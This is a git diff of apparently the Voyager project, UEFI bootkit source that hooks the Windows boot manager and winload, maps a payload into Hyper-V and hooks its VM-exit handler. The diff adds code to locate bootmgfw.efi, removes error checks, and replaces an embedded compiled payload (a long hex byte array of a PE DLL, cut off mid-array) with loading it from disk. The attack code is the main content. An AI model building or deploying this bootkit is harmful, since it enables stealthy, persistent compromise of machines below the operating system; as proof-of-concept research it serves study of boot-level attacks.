a/Voyager-1/Voyager-1 (2004-1709)/Utils.h +++ b/Voyager-1/Voyager-1 (2004-1709)/Utils.h @@ -1,6 +1,6 @@ #pragma once #include "ShitHook.h" -#define WINVER 2004 +#define WINVER 1709 #define PORT_NUM 0x2F8 #define BL_MEMORY_ATTRIBUTE_RWX 0x424000 #define SECTION_RWX (EFI_IMAGE_SCN_MEM_READ | EFI_IMAGE_SCN_MEM_WRITE | EFI_IMAGE_SCN_MEM_EXECUTE) diff --git a/Voyager-1/Voyager-1 (2004-1709)/Voyager-1 (2004-1709).vcxproj b/Voyager-1/Voyager-1 (2004-1709)/Voyager-1 (2004-1709).vcxproj index 43514d0..4356074 100644 --- a/Voyager-1/Voyager-1 (2004-1709)/Voyager-1 (2004-1709).vcxproj +++ b/Voyager-1/Voyager-1 (2004-1709)/Voyager-1 (2004-1709).vcxproj @@ -132,6 +132,8 @@ true SyncCThrow false + Disabled + Disabled EFI Application @@ -150,13 +152,15 @@ Level3 true - true + false true NDEBUG;_CONSOLE;%(PreprocessorDefinitions) true true SyncCThrow false + Disabled + Disabled EFI Application diff --git a/Voyager-1/Voyager-1 (2004-1709)/WinLoad.c b/Voyager-1/Voyager-1 (2004-1709)/WinLoad.c index d36e964..6ee588a 100644 --- a/Voyager-1/Voyager-1 (2004-1709)/WinLoad.c +++ b/Voyager-1/Voyager-1 (2004-1709)/WinLoad.c @@ -48,7 +48,7 @@ EFI_STATUS EFIAPI BlLdrLoadImage(VOID* Arg1, CHAR16* ModulePath, CHAR16* ModuleN { if (!AsciiStrCmp(&pSection->Name, ".reloc")) { - voyager_t VoyagerData; + VOYAGER_T VoyagerData; MakeVoyagerData ( &VoyagerData, @@ -62,17 +62,12 @@ EFI_STATUS EFIAPI BlLdrLoadImage(VOID* Arg1, CHAR16* ModulePath, CHAR16* ModuleN DBG_PRINT(".reloc section end (aka golden record base address) -> 0x%p\n", TableEntry->ModuleBase + pSection->VirtualAddress + pSection->Misc.VirtualSize); VOID* VmExitHook = MapModule(&VoyagerData, PayLoad); - if (!VmExitHook) - return Result; - VOID* VmExitFunction = HookVmExit ( VoyagerData.HypervModuleBase, VoyagerData.HypervModuleSize, VmExitHook ); - if (!VmExitFunction) - return Result; pSection->Characteristics = SECTION_RWX; pSection->Misc.VirtualSize += PayLoadSize(); diff --git a/Voyager-2/Voyager-2 (1703-1511)/BootMgfw.c b/Voyager-2/Voyager-2 (1703-1511)/BootMgfw.c index f98ec7f..3a65c6e 100644 --- a/Voyager-2/Voyager-2 (1703-1511)/BootMgfw.c +++ b/Voyager-2/Voyager-2 (1703-1511)/BootMgfw.c @@ -131,6 +131,49 @@ EFI_STATUS EFIAPI RestoreBootMgfw(VOID) return EFI_ABORTED; } +EFI_DEVICE_PATH* EFIAPI GetBootMgfwPath(VOID) +{ + UINTN HandleCount = NULL; + EFI_STATUS Result; + EFI_HANDLE* Handles = NULL; + EFI_DEVICE_PATH* DevicePath = NULL; + EFI_FILE_HANDLE VolumeHandle; + EFI_FILE_HANDLE BootMgfwHandle; + EFI_FILE_IO_INTERFACE* FileSystem = NULL; + + if (EFI_ERROR((Result = gBS->LocateHandleBuffer(ByProtocol, &gEfiSimpleFileSystemProtocolGuid, NULL, &HandleCount, &Handles)))) + { + Print(L"error getting file system handles -> 0x%p\n", Result); + return DevicePath; + } + + for (UINT32 Idx = 0u; Idx < HandleCount && !FileSystem; ++Idx) + { + if (EFI_ERROR((Result = gBS->OpenProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, (VOID**)&FileSystem, gImageHandle, NULL, EFI_OPEN_PROTOCOL_GET_PROTOCOL)))) + { + Print(L"error opening protocol -> 0x%p\n", Result); + return DevicePath; + } + + if (EFI_ERROR((Result = FileSystem->OpenVolume(FileSystem, &VolumeHandle)))) + { + Print(L"error opening file system -> 0x%p\n", Result); + return DevicePath; + } + + if (!EFI_ERROR(VolumeHandle->Open(VolumeHandle, &BootMgfwHandle, WINDOWS_BOOTMGFW_PATH, EFI_FILE_MODE_READ, EFI_FILE_READ_ONLY))) + DevicePath = FileDevicePath(Handles[Idx], WINDOWS_BOOTMGFW_PATH); + + VolumeHandle->Close(BootMgfwHandle); + if (EFI_ERROR((Result = gBS->CloseProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, gImageHandle, NULL)))) + { + Print(L"error closing protocol -> 0x%p\n", Result); + return DevicePath; + } + } + return DevicePath; +} + EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE ImageHandle) { EFI_STATUS Result = EFI_SUCCESS; diff --git a/Voyager-2/Voyager-2 (1703-1511)/BootMgfw.h b/Voyager-2/Voyager-2 (1703-1511)/BootMgfw.h index 03e1cb7..3764c7f 100644 --- a/Voyager-2/Voyager-2 (1703-1511)/BootMgfw.h +++ b/Voyager-2/Voyager-2 (1703-1511)/BootMgfw.h @@ -24,5 +24,6 @@ static_assert(sizeof(START_BOOT_APPLICATION_SIG) == sizeof(START_BOOT_APPLICATIO extern SHITHOOK BootMgfwShitHook; typedef EFI_STATUS(EFIAPI* IMG_ARCH_START_BOOT_APPLICATION)(VOID*, VOID*, UINT32, UINT8, VOID*); EFI_STATUS EFIAPI RestoreBootMgfw(VOID); +EFI_DEVICE_PATH* EFIAPI GetBootMgfwPath(VOID); EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE ImageHandle); EFI_STATUS EFIAPI ArchStartBootApplicationHook(VOID* AppEntry, VOID* ImageBase, UINT32 ImageSize, UINT8 BootOption, VOID* ReturnArgs); diff --git a/Voyager-2/Voyager-2 (1703-1511)/PayLoad.c b/Voyager-2/Voyager-2 (1703-1511)/PayLoad.c index 51caad9..5e277a8 100644 --- a/Voyager-2/Voyager-2 (1703-1511)/PayLoad.c +++ b/Voyager-2/Voyager-2 (1703-1511)/PayLoad.c @@ -1,5 +1,9 @@ #include "PayLoad.h" +// this can also just be set at compile time if you want too, but for PoC im going +// to read the payload from disk and delete it after... +VOID* PayLoad = NULL; + UINT32 PayLoadSize(VOID) { EFI_IMAGE_DOS_HEADER* RecordDosImageHeader = PayLoad; @@ -26,220 +30,91 @@ VOID* PayLoadEntry(VOID* ModuleBase) return (UINT64)ModuleBase + RecordNtHeaders->OptionalHeader.AddressOfEntryPoint; } -unsigned char PayLoad[2560] = +EFI_STATUS LoadPayLoadFromDisk(VOID** PayLoadBufferPtr) { - 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, - 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0xB8, 0x00, 0x00, 0x00, 0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD, - 0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70, - 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F, - 0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E, 0x20, 0x69, 0x6E, 0x20, - 0x44, 0x4F, 0x53, 0x20, 0x6D, 0x6F, 0x64, 0x65, 0x2E, 0x0D, 0x0D, 0x0A, - 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2F, 0xBF, 0x31, 0xDD, - 0x6B, 0xDE, 0x5F, 0x8E, 0x6B, 0xDE, 0x5F, 0x8E, 0x6B, 0xDE, 0x5F, 0x8E, - 0xDC, 0xAF, 0x5A, 0x8F, 0x6A, 0xDE, 0x5F, 0x8E, 0xDC, 0xAF, 0x5F, 0x8F, - 0x6A, 0xDE, 0x5F, 0x8E, 0xDC, 0xAF, 0x5D, 0x8F, 0x6A, 0xDE, 0x5F, 0x8E, - 0x52, 0x69, 0x63, 0x68, 0x6B, 0xDE, 0x5F, 0x8E, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x50, 0x45, 0x00, 0x00, 0x64, 0x86, 0x04, 0x00, - 0x56, 0xD5, 0x76, 0x5F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0xF0, 0x00, 0x22, 0x20, 0x0B, 0x02, 0x0E, 0x1B, 0x00, 0x02, 0x00, 0x00, - 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, - 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, - 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, - 0x0A, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x50, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x39, 0xEC, 0x00, 0x00, - 0x01, 0x00, 0x60, 0x01, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, - 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, - 0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00, - 0x69, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, - 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x68, 0x2E, 0x72, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0xF4, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, - 0x00, 0x02, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48, - 0x2E, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, - 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x40, 0x00, 0x00, 0xC8, 0x2E, 0x65, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, - 0x65, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, - 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x00, 0x00, 0x00, - 0x00, 0x4C, 0x8B, 0x80, 0xF0, 0x82, 0x00, 0x00, 0x49, 0x8B, 0x80, 0x90, - 0x00, 0x00, 0x00, 0x4C, 0x8B, 0x80, 0x40, 0x0C, 0x00, 0x00, 0x49, 0x83, - 0x78, 0x70, 0x72, 0x75, 0x33, 0x48, 0xB8, 0xEF, 0xBE, 0xAD, 0xDE, 0xEF, - 0xBE, 0xAD, 0xDE, 0x48, 0x39, 0x42, 0x08, 0x75, 0x23, 0x49, 0x8B, 0x80, - 0xC8, 0x00, 0x00, 0x00, 0x49, 0x89, 0x80, 0x78, 0x05, 0x00, 0x00, 0x49, - 0xC7, 0x80, 0xF8, 0x05, 0x00, 0x00, 0xEE, 0xFF, 0xC0, 0x00, 0x65, 0x48, - 0x8B, 0x04, 0x25, 0x00, 0x00, 0x00, 0x00, 0xC3, 0x48, 0x8D, 0x05, 0xA1, - 0xFF, 0xFF, 0xFF, 0x48, 0x2B, 0x05, 0x9A, 0x1F, 0x00, 0x00, 0x48, 0xFF, - 0xE0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x56, 0xD5, 0x76, 0x5F, 0x00, 0x00, 0x00, 0x00, - 0x02, 0x00, 0x00, 0x00, 0x59, 0x00, 0x00, 0x00, 0x38, 0x20, 0x00, 0x00, - 0x38, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x56, 0xD5, 0x76, 0x5F, - 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, - 0x94, 0x20, 0x00, 0x00, 0x94, 0x06, 0x00, 0x00, 0x52, 0x53, 0x44, 0x53, - 0xE1, 0x7F, 0x6D, 0x89, 0xA5, 0x8B, 0x78, 0x48, 0x90, 0x94, 0x47, 0x89, - 0xD5, 0x64, 0xB3, 0x11, 0x03, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x55, - 0x73, 0x65, 0x72, 0x73, 0x5C, 0x78, 0x65, 0x72, 0x6F, 0x78, 0x5C, 0x44, - 0x65, 0x73, 0x6B, 0x74, 0x6F, 0x70, 0x5C, 0x76, 0x6F, 0x79, 0x61, 0x67, - 0x65, 0x72, 0x5C, 0x56, 0x6F, 0x79, 0x61, 0x67, 0x65, 0x72, 0x2D, 0x32, - 0x5C, 0x78, 0x36, 0x34, 0x5C, 0x52, 0x65, 0x6C, 0x65, 0x61, 0x73, 0x65, - 0x5C, 0x50, 0x61, 0x79, 0x4C, 0x6F, 0x61, 0x64, 0x2E, 0x70, 0x64, 0x62, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, - 0x69, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x24, 0x6D, 0x6E, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x38, 0x00, 0x00, 0x00, - 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x38, 0x20, 0x00, 0x00, - 0xBC, 0x00, 0x00, 0x00, 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x24, 0x7A, - 0x7A, 0x7A, 0x64, 0x62, 0x67, 0x00, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, - 0x28, 0x00, 0x00, 0x00, 0x2E, 0x62, 0x73, 0x73, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x40, 0x00, 0x00, 0x65, 0x00, 0x00, 0x00, 0x2E, 0x65, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x32, 0x40, 0x00, 0x00, - 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, - 0x28, 0x40, 0x00, 0x00, 0x2C, 0x40, 0x00, 0x00, 0x30, 0x40, 0x00, 0x00, - 0x00, 0x30, 0x00, 0x00, 0x3E, 0x40, 0x00, 0x00, 0x00, 0x00, 0x50, 0x61, - 0x79, 0x4C, 0x6F, 0x61, 0x64, 0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x3F, 0x76, - 0x6F, 0x79, 0x61, 0x67, 0x65, 0x72, 0x5F, 0x63, 0x6F, 0x6E, 0x74, 0x65, - 0x78, 0x74, 0x40, 0x73, 0x76, 0x6D, 0x40, 0x40, 0x33, 0x55, 0x5F, 0x76, - 0x6F, 0x79, 0x61, 0x67, 0x65, 0x72, 0x5F, 0x74, 0x40, 0x31, 0x40, 0x41, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 